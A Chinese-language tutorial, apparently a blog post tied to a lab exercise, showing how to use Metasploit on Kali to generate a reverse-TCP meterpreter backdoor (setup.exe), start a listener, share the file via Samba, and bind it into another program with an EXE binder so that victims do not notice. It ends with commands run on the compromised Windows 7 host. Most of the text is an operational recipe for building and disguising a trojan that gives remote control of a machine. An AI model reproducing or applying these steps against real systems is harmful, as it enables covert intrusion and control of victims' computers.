Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

一、生成setup.exe后门程序,即木马程序

额外扩展知识点:

二、将生成的木马程序与某个软件进行捆绑

三、检测目标主机,对目标主机进行渗透测试


 

一、生成setup.exe后门程序,即木马程序

操作步骤

1、已知本机ip为10.1.1.92,在kali 命令终端使用msfpayload 生成名为setup的后门程序:

      msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.92  x > setup.exe 

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第1张图片

2、进入setup.exe所在目录,修改属性:选择“允许以程序执行文件”

pwd 查看生成的setup.exe 木马在那个路径

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第2张图片

去根路径验证一下,是否存在刚刚生成的setup.exe 木马

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第3张图片

点击setup.exe 右键修改属性(Properties):选择“允许以程序执行文件”(Allow executing file as program)

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第4张图片

3、kali 命令终端输入 msfconsole ,启动metasploit 

4. 输入use exploit/multi/handler 来加载 exploit/multi/handler 模块

5. 输入set LHOST 10.1.1.92 来设置本地主机

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第5张图片

6. 然后输入exploit -z -j 开始监听

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第6张图片

额外扩展知识点:

      后门程序共享至windows 客户端,Kali共享文件夹方法如下其实也不用这么麻烦,只要直接用ftp 传输到不就好了,会的的朋友,直接跳过就好,当然多懂一点东西也不是坏事,一起往下看看吧):

      (1) 建立本地要共享的目录

      mkdir /a/share -p

      # 修改权限

      chmod 777 -R /a/share

   

      赋予权限

      验证赋予权限是否成功

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第7张图片

      (2) 修改配置文件

      vim /etc/samba/smb.conf

      # 按i按键可以直接增加新行

      # 然后在尾部加入如下代码

      [share]

            path =/a/share

            available = yes

            browsealbe = yes

            public= no

            writable = yes
      # 代码写完后,按Esc键,然后输入:wq ,最后回车Enter一下,保存并退出

      vim /etc/samba/smb.conf

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第8张图片

      (3) 创建用户和设置密码

      useradd a

      smbpasswd -a a

      # 建立好帐号和密码

      创建账号和密码

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第9张图片

      (4) 启动 /etc/init.d/samba

  /etc/init.d/samba restart

      # 成功启动后在Windows下访问共享目录

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第10张图片

 

 

二、将生成的木马程序与某个软件进行捆绑

      windows系统下使用exe捆绑软件将setup.exe和一个其他的某个安全软件合并为一个软件,这样在运行软件时两个软件同时运行,不会引起受害者注意。

      下载EXE捆绑机 (exekunbang)程序,然后打开ExeBinder.exe捆绑软件。

       选择第一个要合并的软件,默认选择本软件中自带的小游戏程序:

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第11张图片

      点击下一步,选择第二个要捆绑的软件,即之前生成的木马程序setup.exe:

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第12张图片

      点击下一步,选择一个文件要保存的路径:

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第13张图片

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第14张图片

      继续点击下一步,开始捆绑软件:

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第15张图片

 

三、检测目标主机,对目标主机进行渗透测试

操作步骤

1、目标主机执行程序后,kali终端中的检测程序会及时检测到

      注:在检测到目标主机运行程序后,后门程序会反向连接到msf,之后msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。输入sessions,可以看到目标主机的ip为10.1.1.91。

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第16张图片

2、然后输入sessions -i 1,之后可以对目标主机进行一系列的操作,如输入sysinfo可知道目标主机的系统信息;输入 getuid查看对方正在运行的用户,输入ipconfig 查看网络配置信息等等

Metasploit:kali 利用捆绑木马软件渗透Win 7 服务器_第17张图片

参考链接:http://www.hetianlab.com/expc.do?ce=6a76b97c-31c5-4858-909d-8c10949ae79c


我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重


 

你可能感兴趣的:(渗透测试,Metasploit,学习)